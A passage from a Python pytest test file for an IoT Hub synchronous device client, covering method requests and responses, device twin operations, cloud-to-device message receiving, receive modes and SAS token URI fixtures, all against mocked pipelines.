assert inbox_mock.get.call_count == 1
assert received_request is received_request
@pytest.mark.it("Can be called in various modes")
@pytest.mark.parametrize(
"method_name",
[pytest.param(None, id="Generic Method"), pytest.param("method_x", id="Named Method")],
)
@pytest.mark.parametrize(
"block,timeout",
[
pytest.param(True, None, id="Blocking, no timeout"),
pytest.param(True, 10, id="Blocking with timeout"),
pytest.param(False, None, id="Nonblocking"),
],
)
def test_receive_method_request_can_be_called_in_mode(
self, mocker, client, block, timeout, method_name
):
inbox_mock = mocker.MagicMock(autospec=SyncClientInbox)
mocker.patch.object(
target=client._inbox_manager,
attribute="get_method_request_inbox",
return_value=inbox_mock,
)
client.receive_method_request(method_name=method_name, block=block, timeout=timeout)
assert inbox_mock.get.call_count == 1
assert inbox_mock.get.call_args == mocker.call(block=block, timeout=timeout)
@pytest.mark.it("Defaults to blocking mode with no timeout")
@pytest.mark.parametrize(
"method_name",
[pytest.param(None, id="Generic Method"), pytest.param("method_x", id="Named Method")],
)
def test_receive_method_request_default_mode(self, mocker, client, method_name):
inbox_mock = mocker.MagicMock(autospec=SyncClientInbox)
mocker.patch.object(
target=client._inbox_manager,
attribute="get_method_request_inbox",
return_value=inbox_mock,
)
client.receive_method_request(method_name=method_name)
assert inbox_mock.get.call_count == 1
assert inbox_mock.get.call_args == mocker.call(block=True, timeout=None)
@pytest.mark.it("Blocks until a method request is available, in blocking mode")
@pytest.mark.parametrize(
"method_name",
[pytest.param(None, id="Generic Method"), pytest.param("method_x", id="Named Method")],
)
def test_no_method_request_in_inbox_blocking_mode(self, client, method_name):
request = MethodRequest(request_id="1", name=method_name, payload={"key": "value"})
inbox = client._inbox_manager.get_method_request_inbox(method_name)
assert inbox.empty()
def insert_item_after_delay():
time.sleep(0.01)
inbox.put(request)
insertion_thread = threading.Thread(target=insert_item_after_delay)
insertion_thread.start()
received_request = client.receive_method_request(method_name, block=True)
assert received_request is request
# This proves that the blocking happens because 'received_request' can't be
# 'request' until after a 10 millisecond delay on the insert. But because the
# 'received_request' IS 'request', it means that client.receive_method_request
# did not return until after the delay.
@pytest.mark.it(
"Returns None after a timeout while blocking, in blocking mode with a specified timeout"
)
@pytest.mark.parametrize(
"method_name",
[pytest.param(None, id="Generic Method"), pytest.param("method_x", id="Named Method")],
)
def test_times_out_waiting_for_message_blocking_mode(self, client, method_name):
result = client.receive_method_request(method_name, block=True, timeout=0.01)
assert result is None
@pytest.mark.it("Returns None immediately if there are no messages, in nonblocking mode")
@pytest.mark.parametrize(
"method_name",
[pytest.param(None, id="Generic Method"), pytest.param("method_x", id="Named Method")],
)
def test_no_message_in_inbox_nonblocking_mode(self, client, method_name):
result = client.receive_method_request(method_name, block=False)
assert result is None
@pytest.mark.it("Locks the client to API Receive Mode if the receive mode has not yet been set")
@pytest.mark.parametrize(
"method_name",
[pytest.param(None, id="Generic Method"), pytest.param("method_x", id="Named Method")],
)
@pytest.mark.parametrize(
"block,timeout",
[
pytest.param(True, None, id="Blocking, no timeout"),
pytest.param(True, 10, id="Blocking with timeout"),
pytest.param(False, None, id="Nonblocking"),
],
)
def test_receive_mode_not_set(self, mocker, client, method_name, block, timeout):
inbox_mock = mocker.MagicMock(autospec=SyncClientInbox)
mocker.patch.object(
client._inbox_manager, "get_method_request_inbox", return_value=inbox_mock
)
assert client._receive_type is RECEIVE_TYPE_NONE_SET
client.receive_method_request(method_name=method_name, block=block, timeout=timeout)
assert client._receive_type is RECEIVE_TYPE_API
@pytest.mark.it(
"Does not modify the client receive mode if it has already been set to API Receive Mode"
)
@pytest.mark.parametrize(
"method_name",
[pytest.param(None, id="Generic Method"), pytest.param("method_x", id="Named Method")],
)
@pytest.mark.parametrize(
"block,timeout",
[
pytest.param(True, None, id="Blocking, no timeout"),
pytest.param(True, 10, id="Blocking with timeout"),
pytest.param(False, None, id="Nonblocking"),
],
)
def test_receive_mode_set_api(self, mocker, client, method_name, block, timeout):
inbox_mock = mocker.MagicMock(autospec=SyncClientInbox)
mocker.patch.object(
client._inbox_manager, "get_method_request_inbox", return_value=inbox_mock
)
client._receive_type = RECEIVE_TYPE_API
client.receive_method_request(method_name=method_name, block=block, timeout=timeout)
assert client._receive_type is RECEIVE_TYPE_API
@pytest.mark.it(
"Raises a ClientError and does nothing else if the client receive mode has been set to Handler Receive Mode"
)
@pytest.mark.parametrize(
"method_name",
[pytest.param(None, id="Generic Method"), pytest.param("method_x", id="Named Method")],
)
@pytest.mark.parametrize(
"block,timeout",
[
pytest.param(True, None, id="Blocking, no timeout"),
pytest.param(True, 10, id="Blocking with timeout"),
pytest.param(False, None, id="Nonblocking"),
],
)
def test_receive_mode_set_handler(
self, mocker, client, mqtt_pipeline, method_name, block, timeout
):
inbox_mock = mocker.MagicMock(autospec=SyncClientInbox)
mocker.patch.object(
client._inbox_manager, "get_method_request_inbox", return_value=inbox_mock
)
# patch this so we can make sure feature enabled isn't modified
mqtt_pipeline.feature_enabled.__getitem__.return_value = False
client._receive_type = RECEIVE_TYPE_HANDLER
# Error was raised
with pytest.raises(client_exceptions.ClientError):
client.receive_method_request(method_name=method_name, block=block, timeout=timeout)
# Feature was not enabled
assert mqtt_pipeline.enable_feature.call_count == 0
# Inbox get was not called
assert inbox_mock.get.call_count == 0
class SharedClientSendMethodResponseTests(WaitsForEventCompletion):
@pytest.mark.it("Begins a 'send_method_response' pipeline operation")
def test_send_method_response_calls_pipeline(self, client, mqtt_pipeline, method_response):
client.send_method_response(method_response)
assert mqtt_pipeline.send_method_response.call_count == 1
assert mqtt_pipeline.send_method_response.call_args[0][0] is method_response
@pytest.mark.it(
"Waits for the completion of the 'send_method_response' pipeline operation before returning"
)
def test_waits_for_pipeline_op_completion(
self, mocker, client_manual_cb, mqtt_pipeline_manual_cb, method_response
):
self.add_event_completion_checks(
mocker=mocker, pipeline_function=mqtt_pipeline_manual_cb.send_method_response
)
client_manual_cb.send_method_response(method_response)
@pytest.mark.it(
"Raises a client error if the `send_method_response` pipeline operation calls back with a pipeline error"
)
@pytest.mark.parametrize(
"pipeline_error,client_error",
[
pytest.param(
pipeline_exceptions.ConnectionDroppedError,
client_exceptions.ConnectionDroppedError,
id="ConnectionDroppedError->ConnectionDroppedError",
),
pytest.param(
pipeline_exceptions.ConnectionFailedError,
client_exceptions.ConnectionFailedError,
id="ConnectionFailedError->ConnectionFailedError",
),
pytest.param(
pipeline_exceptions.NoConnectionError,
client_exceptions.NoConnectionError,
id="NoConnectionError->NoConnectionError",
),
pytest.param(
pipeline_exceptions.UnauthorizedError,
client_exceptions.CredentialError,
id="UnauthorizedError->CredentialError",
),
pytest.param(
pipeline_exceptions.ProtocolClientError,
client_exceptions.ClientError,
id="ProtocolClientError->ClientError",
),
pytest.param(
pipeline_exceptions.OperationCancelled,
client_exceptions.OperationCancelled,
id="OperationCancelled -> OperationCancelled",
),
pytest.param(Exception, client_exceptions.ClientError, id="Exception->ClientError"),
],
)
def test_raises_error_on_pipeline_op_error(
self,
mocker,
client_manual_cb,
mqtt_pipeline_manual_cb,
method_response,
pipeline_error,
client_error,
):
my_pipeline_error = pipeline_error()
self.add_event_completion_checks(
mocker=mocker,
pipeline_function=mqtt_pipeline_manual_cb.send_method_response,
kwargs={"error": my_pipeline_error},
)
with pytest.raises(client_error) as e_info:
client_manual_cb.send_method_response(method_response)
assert e_info.value.__cause__ is my_pipeline_error
class SharedClientGetTwinTests(WaitsForEventCompletion):
@pytest.fixture
def patch_get_twin_to_return_fake_twin(self, fake_twin, mocker, mqtt_pipeline):
def immediate_callback(callback):
callback(twin=fake_twin)
mocker.patch.object(mqtt_pipeline, "get_twin", side_effect=immediate_callback)
@pytest.mark.it("Implicitly enables twin messaging feature if not already enabled")
def test_enables_twin_only_if_not_already_enabled(
self, mocker, client, mqtt_pipeline, patch_get_twin_to_return_fake_twin, fake_twin
):
# Verify twin enabled if not enabled
mqtt_pipeline.feature_enabled.__getitem__.return_value = False # twin will appear disabled
client.get_twin()
assert mqtt_pipeline.enable_feature.call_count == 1
assert mqtt_pipeline.enable_feature.call_args[0][0] == pipeline_constant.TWIN
mqtt_pipeline.enable_feature.reset_mock()
# Verify twin not enabled if already enabled
mqtt_pipeline.feature_enabled.__getitem__.return_value = True # twin will appear enabled
client.get_twin()
assert mqtt_pipeline.enable_feature.call_count == 0
@pytest.mark.it("Begins a 'get_twin' pipeline operation")
def test_get_twin_calls_pipeline(self, client, mqtt_pipeline):
client.get_twin()
assert mqtt_pipeline.get_twin.call_count == 1
@pytest.mark.it(
"Waits for the completion of the 'get_twin' pipeline operation before returning"
)
def test_waits_for_pipeline_op_completion(
self, mocker, client_manual_cb, mqtt_pipeline_manual_cb, fake_twin
):
self.add_event_completion_checks(
mocker=mocker,
pipeline_function=mqtt_pipeline_manual_cb.get_twin,
kwargs={"twin": fake_twin},
)
client_manual_cb.get_twin()
@pytest.mark.it(
"Raises a client error if the `get_twin` pipeline operation calls back with a pipeline error"
)
@pytest.mark.parametrize(
"pipeline_error,client_error",
[
pytest.param(
pipeline_exceptions.ConnectionDroppedError,
client_exceptions.ConnectionDroppedError,
id="ConnectionDroppedError->ConnectionDroppedError",
),
pytest.param(
pipeline_exceptions.ConnectionFailedError,
client_exceptions.ConnectionFailedError,
id="ConnectionFailedError->ConnectionFailedError",
),
pytest.param(
pipeline_exceptions.NoConnectionError,
client_exceptions.NoConnectionError,
id="NoConnectionError->NoConnectionError",
),
pytest.param(
pipeline_exceptions.UnauthorizedError,
client_exceptions.CredentialError,
id="UnauthorizedError->CredentialError",
),
pytest.param(
pipeline_exceptions.ProtocolClientError,
client_exceptions.ClientError,
id="ProtocolClientError->ClientError",
),
pytest.param(
pipeline_exceptions.OperationCancelled,
client_exceptions.OperationCancelled,
id="OperationCancelled -> OperationCancelled",
),
pytest.param(Exception, client_exceptions.ClientError, id="Exception->ClientError"),
],
)
def test_raises_error_on_pipeline_op_error(
self, mocker, client_manual_cb, mqtt_pipeline_manual_cb, pipeline_error, client_error
):
my_pipeline_error = pipeline_error()
self.add_event_completion_checks(
mocker=mocker,
pipeline_function=mqtt_pipeline_manual_cb.get_twin,
kwargs={"error": my_pipeline_error},
)
with pytest.raises(client_error) as e_info:
client_manual_cb.get_twin()
assert e_info.value.__cause__ is my_pipeline_error
@pytest.mark.it("Returns the twin that the pipeline returned")
def test_verifies_twin_returned(
self, mocker, client_manual_cb, mqtt_pipeline_manual_cb, fake_twin
):
self.add_event_completion_checks(
mocker=mocker,
pipeline_function=mqtt_pipeline_manual_cb.get_twin,
kwargs={"twin": fake_twin},
)
returned_twin = client_manual_cb.get_twin()
assert returned_twin == fake_twin
class SharedClientPatchTwinReportedPropertiesTests(WaitsForEventCompletion):
@pytest.mark.it("Implicitly enables twin messaging feature if not already enabled")
def test_enables_twin_only_if_not_already_enabled(
self, mocker, client, mqtt_pipeline, twin_patch_reported
):
# patch this so x_get_twin won't block
def immediate_callback(patch, callback):
callback()
mocker.patch.object(
mqtt_pipeline, "patch_twin_reported_properties", side_effect=immediate_callback
)
# Verify twin enabled if not enabled
mqtt_pipeline.feature_enabled.__getitem__.return_value = False # twin will appear disabled
client.patch_twin_reported_properties(twin_patch_reported)
assert mqtt_pipeline.enable_feature.call_count == 1
assert mqtt_pipeline.enable_feature.call_args[0][0] == pipeline_constant.TWIN
mqtt_pipeline.enable_feature.reset_mock()
# Verify twin not enabled if already enabled
mqtt_pipeline.feature_enabled.__getitem__.return_value = True # twin will appear enabled
client.patch_twin_reported_properties(twin_patch_reported)
assert mqtt_pipeline.enable_feature.call_count == 0
@pytest.mark.it("Begins a 'patch_twin_reported_properties' pipeline operation")
def test_patch_twin_reported_properties_calls_pipeline(
self, client, mqtt_pipeline, twin_patch_reported
):
client.patch_twin_reported_properties(twin_patch_reported)
assert mqtt_pipeline.patch_twin_reported_properties.call_count == 1
assert (
mqtt_pipeline.patch_twin_reported_properties.call_args[1]["patch"]
is twin_patch_reported
)
@pytest.mark.it(
"Waits for the completion of the 'patch_twin_reported_properties' pipeline operation before returning"
)
def test_waits_for_pipeline_op_completion(
self, mocker, client_manual_cb, mqtt_pipeline_manual_cb, twin_patch_reported
):
self.add_event_completion_checks(
mocker=mocker, pipeline_function=mqtt_pipeline_manual_cb.patch_twin_reported_properties
)
client_manual_cb.patch_twin_reported_properties(twin_patch_reported)
@pytest.mark.it(
"Raises a client error if the `patch_twin_reported_properties` pipeline operation calls back with a pipeline error"
)
@pytest.mark.parametrize(
"pipeline_error,client_error",
[
pytest.param(
pipeline_exceptions.ConnectionDroppedError,
client_exceptions.ConnectionDroppedError,
id="ConnectionDroppedError->ConnectionDroppedError",
),
pytest.param(
pipeline_exceptions.ConnectionFailedError,
client_exceptions.ConnectionFailedError,
id="ConnectionFailedError->ConnectionFailedError",
),
pytest.param(
pipeline_exceptions.NoConnectionError,
client_exceptions.NoConnectionError,
id="NoConnectionError->NoConnectionError",
),
pytest.param(
pipeline_exceptions.UnauthorizedError,
client_exceptions.CredentialError,
id="UnauthorizedError->CredentialError",
),
pytest.param(
pipeline_exceptions.ProtocolClientError,
client_exceptions.ClientError,
id="ProtocolClientError->ClientError",
),
pytest.param(
pipeline_exceptions.OperationCancelled,
client_exceptions.OperationCancelled,
id="OperationCancelled -> OperationCancelled",
),
pytest.param(Exception, client_exceptions.ClientError, id="Exception->ClientError"),
],
)
def test_raises_error_on_pipeline_op_error(
self,
mocker,
client_manual_cb,
mqtt_pipeline_manual_cb,
twin_patch_reported,
pipeline_error,
client_error,
):
my_pipeline_error = pipeline_error()
self.add_event_completion_checks(
mocker=mocker,
pipeline_function=mqtt_pipeline_manual_cb.patch_twin_reported_properties,
kwargs={"error": my_pipeline_error},
)
with pytest.raises(client_error) as e_info:
client_manual_cb.patch_twin_reported_properties(twin_patch_reported)
assert e_info.value.__cause__ is my_pipeline_error
class SharedClientReceiveTwinDesiredPropertiesPatchTests(object):
@pytest.mark.it(
"Implicitly enables Twin desired properties patch feature if not already enabled"
)
def test_enables_twin_patches_only_if_not_already_enabled(self, mocker, client, mqtt_pipeline):
mocker.patch.object(
SyncClientInbox, "get"
) # patch this so receive_twin_desired_properties_patch won't block
# Verify twin patches enabled if not enabled
mqtt_pipeline.feature_enabled.__getitem__.return_value = (
False # twin patches will appear disabled
)
client.receive_twin_desired_properties_patch()
assert mqtt_pipeline.enable_feature.call_count == 1
assert mqtt_pipeline.enable_feature.call_args[0][0] == pipeline_constant.TWIN_PATCHES
mqtt_pipeline.enable_feature.reset_mock()
# Verify twin patches not enabled if already enabled
mqtt_pipeline.feature_enabled.__getitem__.return_value = True # C2D will appear enabled
client.receive_twin_desired_properties_patch()
assert mqtt_pipeline.enable_feature.call_count == 0
@pytest.mark.it("Returns a patch from the twin patch inbox, if available")
def test_returns_message_from_twin_patch_inbox(self, mocker, client, twin_patch_desired):
inbox_mock = mocker.MagicMock(autospec=SyncClientInbox)
inbox_mock.get.return_value = twin_patch_desired
manager_get_inbox_mock = mocker.patch.object(
client._inbox_manager, "get_twin_patch_inbox", return_value=inbox_mock
)
received_patch = client.receive_twin_desired_properties_patch()
assert manager_get_inbox_mock.call_count == 1
assert inbox_mock.get.call_count == 1
assert received_patch is twin_patch_desired
@pytest.mark.it("Can be called in various modes")
@pytest.mark.parametrize(
"block,timeout",
[
pytest.param(True, None, id="Blocking, no timeout"),
pytest.param(True, 10, id="Blocking with timeout"),
pytest.param(False, None, id="Nonblocking"),
],
)
def test_can_be_called_in_mode(self, mocker, client, block, timeout):
inbox_mock = mocker.MagicMock(autospec=SyncClientInbox)
mocker.patch.object(client._inbox_manager, "get_twin_patch_inbox", return_value=inbox_mock)
client.receive_twin_desired_properties_patch(block=block, timeout=timeout)
assert inbox_mock.get.call_count == 1
assert inbox_mock.get.call_args == mocker.call(block=block, timeout=timeout)
@pytest.mark.it("Defaults to blocking mode with no timeout")
def test_default_mode(self, mocker, client):
inbox_mock = mocker.MagicMock(autospec=SyncClientInbox)
mocker.patch.object(client._inbox_manager, "get_twin_patch_inbox", return_value=inbox_mock)
client.receive_twin_desired_properties_patch()
assert inbox_mock.get.call_count == 1
assert inbox_mock.get.call_args == mocker.call(block=True, timeout=None)
@pytest.mark.it("Blocks until a patch is available, in blocking mode")
def test_no_message_in_inbox_blocking_mode(self, client, twin_patch_desired):
twin_patch_inbox = client._inbox_manager.get_twin_patch_inbox()
assert twin_patch_inbox.empty()
def insert_item_after_delay():
time.sleep(0.01)
twin_patch_inbox.put(twin_patch_desired)
insertion_thread = threading.Thread(target=insert_item_after_delay)
insertion_thread.start()
received_patch = client.receive_twin_desired_properties_patch(block=True)
assert received_patch is twin_patch_desired
# This proves that the blocking happens because 'received_patch' can't be
# 'twin_patch_desired' until after a 10 millisecond delay on the insert. But because the
# 'received_patch' IS 'twin_patch_desired', it means that client.receive_twin_desired_properties_patch
# did not return until after the delay.
@pytest.mark.it(
"Returns None after a timeout while blocking, in blocking mode with a specified timeout"
)
def test_times_out_waiting_for_message_blocking_mode(self, client):
result = client.receive_twin_desired_properties_patch(block=True, timeout=0.01)
assert result is None
@pytest.mark.it("Returns None immediately if there are no patches, in nonblocking mode")
def test_no_message_in_inbox_nonblocking_mode(self, client):
result = client.receive_twin_desired_properties_patch(block=False)
assert result is None
@pytest.mark.it("Locks the client to API Receive Mode if the receive mode has not yet been set")
@pytest.mark.parametrize(
"block,timeout",
[
pytest.param(True, None, id="Blocking, no timeout"),
pytest.param(True, 10, id="Blocking with timeout"),
pytest.param(False, None, id="Nonblocking"),
],
)
def test_receive_mode_not_set(self, mocker, client, block, timeout):
inbox_mock = mocker.MagicMock(autospec=SyncClientInbox)
mocker.patch.object(client._inbox_manager, "get_twin_patch_inbox", return_value=inbox_mock)
assert client._receive_type is RECEIVE_TYPE_NONE_SET
client.receive_twin_desired_properties_patch(block=block, timeout=timeout)
assert client._receive_type is RECEIVE_TYPE_API
@pytest.mark.it(
"Does not modify the client receive mode if it has already been set to API Receive Mode"
)
@pytest.mark.parametrize(
"block,timeout",
[
pytest.param(True, None, id="Blocking, no timeout"),
pytest.param(True, 10, id="Blocking with timeout"),
pytest.param(False, None, id="Nonblocking"),
],
)
def test_receive_mode_set_api(self, mocker, client, block, timeout):
inbox_mock = mocker.MagicMock(autospec=SyncClientInbox)
mocker.patch.object(client._inbox_manager, "get_twin_patch_inbox", return_value=inbox_mock)
client._receive_type = RECEIVE_TYPE_API
client.receive_twin_desired_properties_patch(block=block, timeout=timeout)
assert client._receive_type is RECEIVE_TYPE_API
@pytest.mark.it(
"Raises a ClientError and does nothing else if the client receive mode has been set to Handler Receive Mode"
)
@pytest.mark.parametrize(
"block,timeout",
[
pytest.param(True, None, id="Blocking, no timeout"),
pytest.param(True, 10, id="Blocking with timeout"),
pytest.param(False, None, id="Nonblocking"),
],
)
def test_receive_mode_set_handler(self, mocker, client, mqtt_pipeline, block, timeout):
inbox_mock = mocker.MagicMock(autospec=SyncClientInbox)
mocker.patch.object(client._inbox_manager, "get_twin_patch_inbox", return_value=inbox_mock)
# patch this so we can make sure feature enabled isn't modified
mqtt_pipeline.feature_enabled.__getitem__.return_value = False
client._receive_type = RECEIVE_TYPE_HANDLER
# Error was raised
with pytest.raises(client_exceptions.ClientError):
client.receive_twin_desired_properties_patch(block=block, timeout=timeout)
# Feature was not enabled
assert mqtt_pipeline.enable_feature.call_count == 0
# Inbox get was not called
assert inbox_mock.get.call_count == 0
################
# DEVICE TESTS #
################
class IoTHubDeviceClientTestsConfig(object):
@pytest.fixture
def client_class(self):
return IoTHubDeviceClient
@pytest.fixture
def client(self, mqtt_pipeline, http_pipeline):
"""This client automatically resolves callbacks sent to the pipeline.
It should be used for the majority of tests.
"""
return IoTHubDeviceClient(mqtt_pipeline, http_pipeline)
@pytest.fixture
def client_manual_cb(self, mqtt_pipeline_manual_cb, http_pipeline_manual_cb):
"""This client requires manual triggering of the callbacks sent to the pipeline.
It should only be used for tests where manual control fo a callback is required.
"""
return IoTHubDeviceClient(mqtt_pipeline_manual_cb, http_pipeline_manual_cb)
@pytest.fixture
def connection_string(self, device_connection_string):
"""This fixture is parametrized to provie all valid device connection strings.
See client_fixtures.py
"""
return device_connection_string
@pytest.fixture
def sas_token_string(self, device_sas_token_string):
return device_sas_token_string
@pytest.mark.describe("IoTHubDeviceClient (Synchronous) - Instantiation")
class TestIoTHubDeviceClientInstantiation(
IoTHubDeviceClientTestsConfig, SharedIoTHubClientInstantiationTests
):
@pytest.mark.it("Sets on_c2d_message_received handler in the MQTTPipeline")
def test_sets_on_c2d_message_received_handler_in_pipeline(
self, client_class, mqtt_pipeline, http_pipeline
):
client = client_class(mqtt_pipeline, http_pipeline)
assert client._mqtt_pipeline.on_c2d_message_received is not None
assert (
client._mqtt_pipeline.on_c2d_message_received == client._inbox_manager.route_c2d_message
)
@pytest.mark.describe("IoTHubDeviceClient (Synchronous) - .create_from_connection_string()")
class TestIoTHubDeviceClientCreateFromConnectionString(
IoTHubDeviceClientTestsConfig, SharedIoTHubClientCreateFromConnectionStringTests
):
pass
@pytest.mark.describe("IoTHubDeviceClient (Synchronous) - .create_from_sastoken()")
class TestIoTHubDeviceClientCreateFromSastoken(
IoTHubDeviceClientTestsConfig, SharedIoTHubDeviceClientCreateFromSastokenTests
):
pass
@pytest.mark.describe("IoTHubDeviceClient (Synchronous) - .create_from_symmetric_key()")
class TestIoTHubDeviceClientCreateFromSymmetricKey(
IoTHubDeviceClientTestsConfig, SharedIoTHubDeviceClientCreateFromSymmetricKeyTests
):
pass
@pytest.mark.describe("IoTHubDeviceClient (Synchronous) - .create_from_x509_certificate()")
class TestIoTHubDeviceClientCreateFromX509Certificate(
IoTHubDeviceClientTestsConfig, SharedIoTHubDeviceClientCreateFromX509CertificateTests
):
pass
@pytest.mark.describe("IoTHubDeviceClient (Synchronous) - .shutdown()")
class TestIoTHubDeviceClientShutdown(IoTHubDeviceClientTestsConfig, SharedClientShutdownTests):
pass
@pytest.mark.describe("IoTHubDeviceClient (Synchronous) - .update_sastoken()")
class TestIoTHubDeviceClientUpdateSasToken(
IoTHubDeviceClientTestsConfig, SharedClientUpdateSasTokenTests
):
@pytest.fixture
def sas_config(self, sas_token_string):
"""PipelineConfig set up as if using user-provided, non-renewable SAS auth"""
sastoken = st.NonRenewableSasToken(sas_token_string)
token_uri_pieces = sastoken.resource_uri.split("/")
hostname = token_uri_pieces[0]
device_id = token_uri_pieces[2]
sas_config = IoTHubPipelineConfig(hostname=hostname, device_id=device_id, sastoken=sastoken)
return sas_config
@pytest.fixture
def sas_client(self, mqtt_pipeline, http_pipeline, sas_config):
"""Client configured as if using user-provided, non-renewable SAS auth"""
mqtt_pipeline.pipeline_configuration = sas_config
http_pipeline.pipeline_configuration = sas_config
return IoTHubDeviceClient(mqtt_pipeline, http_pipeline)
@pytest.fixture
def uri(self, hostname, device_id):
return "{hostname}/devices/{device_id}".format(hostname=hostname, device_id=device_id)
@pytest.fixture(params=["Nonmatching Device ID", "Nonmatching Hostname"])
def nonmatching_uri(self, request, device_id, hostname):
# NOTE: It would be preferable to have this as a parametrization on a test rather than a
# fixture, however, we need to use the device_id and hostname fixtures in order to ensure
# tests don't break when other fixtures change, and you can't include fixtures in a
# parametrization, so this also has to be a fixture
uri_format = "{hostname}/devices/{device_id}"
if request.param == "Nonmatching Device ID":
return uri_format.format(hostname=hostname, device_id="nonmatching_device")
else:
return uri_format.format(hostname="nonmatching_hostname", device_id=device_id)
@pytest.fixture(
params=["Too short", "Too long", "Incorrectly formatted device notation", "Module URI"]
)
def invalid_uri(self, request, device_id, hostname):
# NOTE: As in the nonmatching_uri fixture above, this is a workaround for parametrization
# that allows the usage of other fixtures in the parametrized value. Weird pattern, but
# necessary to ensure stability of the tests over time.
if request.param == "Too short":
# Doesn't have device ID
return hostname + "/devices"
elif request.param == "Too long":
# Extraneous value at the end
return "{}/devices/{}/somethingElse".format(hostname, device_id)
elif request.param == "Incorrectly formatted device notation":
# Doesn't have '/devices/'
return "{}/not-devices/{}".format(hostname, device_id)
else:
# Valid... for a Module... but this is a Device
return "{}/devices/{}/modules/my_module".format(hostname, device_id)
@pytest.mark.describe("IoTHubDeviceClient (Synchronous) - .connect()")
class TestIoTHubDeviceClientConnect(IoTHubDeviceClientTestsConfig, SharedClientConnectTests):
pass
@pytest.mark.describe("IoTHubDeviceClient (Synchronous) - .disconnect()")
class TestIoTHubDeviceClientDisconnect(IoTHubDeviceClientTestsConfig, SharedClientDisconnectTests):
pass
@pytest.mark.describe("IoTHubDeviceClient (Synchronous) - .send_message()")
class TestIoTHubDeviceClientSendD2CMessage(
IoTHubDeviceClientTestsConfig, SharedClientSendD2CMessageTests
):
pass
@pytest.mark.describe("IoTHubDeviceClient (Synchronous) - .receive_message()")
class TestIoTHubDeviceClientReceiveC2DMessage(
IoTHubDeviceClientTestsConfig, WaitsForEventCompletion
):
@pytest.mark.it("Implicitly enables C2D messaging feature if not already enabled")
def test_enables_c2d_messaging_only_if_not_already_enabled(self, mocker, client, mqtt_pipeline):
mocker.patch.object(SyncClientInbox, "get") # patch this so receive_message won't block
# Verify C2D Messaging enabled if not enabled
mqtt_pipeline.feature_enabled.__getitem__.return_value = False # C2D will appear disabled
client.receive_message()
assert mqtt_pipeline.enable_feature.call_count == 1
assert mqtt_pipeline.enable_feature.call_args[0][0] == pipeline_constant.C2D_MSG
mqtt_pipeline.enable_feature.reset_mock()
# Verify C2D Messaging not enabled if already enabled
mqtt_pipeline.feature_enabled.__getitem__.return_value = True # C2D will appear enabled
client.receive_message()
assert mqtt_pipeline.enable_feature.call_count == 0
@pytest.mark.it("Returns a message from the C2D inbox, if available")
def test_returns_message_from_c2d_inbox(self, mocker, client, message):
inbox_mock = mocker.MagicMock(autospec=SyncClientInbox)
inbox_mock.get.return_value = message
manager_get_inbox_mock = mocker.patch.object(
client._inbox_manager, "get_c2d_message_inbox", return_value=inbox_mock
)
received_message = client.receive_message()
assert manager_get_inbox_mock.call_count == 1
assert inbox_mock.get.call_count == 1
assert received_message is message
@pytest.mark.it("Can be called in various modes")
@pytest.mark.parametrize(
"block,timeout",
[
pytest.param(True, None, id="Blocking, no timeout"),
pytest.param(True, 10, id="Blocking with timeout"),
pytest.param(False, None, id="Nonblocking"),
],
)
def test_can_be_called_in_mode(self, mocker, client, block, timeout):
inbox_mock = mocker.MagicMock(autospec=SyncClientInbox)
mocker.patch.object(client._inbox_manager, "get_c2d_message_inbox", return_value=inbox_mock)
client.receive_message(block=block, timeout=timeout)
assert inbox_mock.get.call_count == 1
assert inbox_mock.get.call_args == mocker.call(block=block, timeout=timeout)
@pytest.mark.it("Defaults to blocking mode with no timeout")
def test_default_mode(self, mocker, client):
inbox_mock = mocker.MagicMock(autospec=SyncClientInbox)
mocker.patch.object(client._inbox_manager, "get_c2d_message_inbox", return_value=inbox_mock)
client.receive_message()
assert inbox_mock.get.call_count == 1
assert inbox_mock.get.call_args == mocker.call(block=True, timeout=None)
@pytest.mark.it("Blocks until a message is available, in blocking mode")
def test_no_message_in_inbox_blocking_mode(self, client, message):
c2d_inbox = client._inbox_manager.get_c2d_message_inbox()
assert c2d_inbox.empty()
def insert_item_after_delay():
time.sleep(0.01)
c2d_inbox.put(message)
insertion_thread = threading.Thread(target=insert_item_after_delay)
insertion_thread.start()
received_message = client.receive_message(block=True)
assert received_message is message
# This proves that the blocking happens because 'received_message' can't be
# 'message' until after a 10 millisecond delay on the insert. But because the
# 'received_message' IS 'message', it means that client.receive_message
# did not return until after the delay.
@pytest.mark.it(
"Returns None after a timeout while blocking, in blocking mode with a specified timeout"
)
def test_times_out_waiting_for_message_blocking_mode(self, client):
result = client.receive_message(block=True, timeout=0.01)
assert result is None
@pytest.mark.it("Returns None immediately if there are no messages, in nonblocking mode")
def test_no_message_in_inbox_nonblocking_mode(self, client):
result = client.receive_message(block=False)
assert result is None
@pytest.mark.it("Locks the client to API Receive Mode if the receive mode has not yet been set")
@pytest.mark.parametrize(
"block,timeout",
[
pytest.param(True, None, id="Blocking, no timeout"),
pytest.param(True, 10, id="Blocking with timeout"),
pytest.param(False, None, id="Nonblocking"),
],
)
def test_receive_mode_not_set(self, mocker, client, block, timeout):
inbox_mock = mocker.MagicMock(autospec=SyncClientInbox)
mocker.patch.object(client._inbox_manager, "get_c2d_message_inbox", return_value=inbox_mock)
assert client._receive_type is RECEIVE_TYPE_NONE_SET
client.receive_message(block=block, timeout=timeout)
assert client._receive_type is RECEIVE_TYPE_API
@pytest.mark.it(
"Does not modify the client receive mode if it has already been set to API Receive Mode"
)
@pytest.mark.parametrize(
"block,timeout",
[
pytest.param(True, None, id="Blocking, no timeout"),
pytest.param(True, 10, id="Blocking with timeout"),
pytest.param(False, None, id="Nonblocking"),
],
)
def test_receive_mode_set_api(self, mocker, client, block, timeout):
inbox_mock = mocker.MagicMock(autospec=SyncClientInbox)
mocker.patch.object(client._inbox_manager, "get_c2d_message_inbox", return_value=inbox_mock)
client._receive_type = RECEIVE_TYPE_API
client.receive_message(block=block, timeout=timeout)
assert client._receive_type is RECEIVE_TYPE_API
@pytest.mark.it(
"Raises a ClientError and does nothing else if the client receive mode has been set to Handler Receive Mode"
)
@pytest.mark.parametrize(
"block,timeout",
[
pytest.param(True, None, id="Blocking, no timeout"),
pytest.param(True, 10, id="Blocking with timeout"),
pytest.param(False, None, id="Nonblocking"),
],
)
def test_receive_mode_set_handler(self, mocker, client, mqtt_pipeline, block, timeout):
inbox_mock = mocker.MagicMock(autospec=SyncClientInbox)
mocker.patch.object(client._inbox_manager, "get_c2d_message_inbox", return_value=inbox_mock)
# patch this so we can make sure feature enabled isn't modified
mqtt_pipeline.feature_enabled.__getitem__.return_value = False
client._receive_type = RECEIVE_TYPE_HANDLER
# Error was raised
with pytest.raises(client_exceptions.ClientError):
